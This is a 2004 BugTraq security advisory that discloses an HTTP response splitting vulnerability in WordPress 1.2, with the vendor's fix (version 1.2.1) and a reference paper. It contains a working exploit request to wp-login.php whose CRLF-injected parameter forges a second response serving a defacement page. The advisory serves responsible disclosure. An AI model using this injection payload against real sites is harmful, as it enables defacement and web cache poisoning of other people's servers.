BugTraq
HTTP Response Splitting Vulnerability in Wordpress 1.2 Oct 06 2004 11:41PM
Chaotic Evil (chaoticevil spyring com)
SECURITY ADVISORY: HTTP Response Splitting in WordPress 1.2

AUTHOR: Chaotic Evil (chaoticevil $$$at$$$ spyring $$$dot$$$ com)

DATE: October 6th, 2004

PRODUCT: WordPress 1.2 (wordpress.org)

FROM THE VENDOR WEBSITE:
WordPress is a state-of-the-art semantic personal
publishing platform with a focus on aesthetics, web
standards, and usability. What a mouthful. WordPress is
both free and priceless at the same time.

WordPress was born out of a desire for an elegant, well-
architectured personal publishing system built on PHP
and MySQL and licensed under the GPL.

SECURITY VULNERABILITY
HTTP Response Splitting [1].

EXPLOIT:
HOSTNAME, USER and PASS should be replaced with the
relevant values (and Content-Length needs to be adjusted
accordingly). Replace curly braces with less-than and
greater-than signs. Code is line wrapped.

POST /wp-login.php HTTP/1.0
Host: HOSTNAME
Content-Type: application/x-www-form-urlencoded
Content-length: 226

action=login&mode=profile&log=USER&pwd=PASS&text=
%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%20
0%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:
%2021%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}
*defaced*{/html}

VENDOR STATUS: Vendor contacted September 24th. Vendor
worked closely with the author and promptly produced a
fix (see below).

FIX: Use WordPress 1.2.1. See vendor site:
http://wordpress.org/development/2004/10/wp-121/

REFERENCES:
[1] "'Divide and Conquer' - HTTP Response SPlitting, Web
Cache Poisoning attacks, and Related Topics" by Amit Klein,
dated March 4th, 2004
http://www.packetstormsecurity.org/papers/general/whitepaper_httprespons
e.pd
f

_____________________________________________
Free email with personality! Over 200 domains!
http://www.MyOwnEmail.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus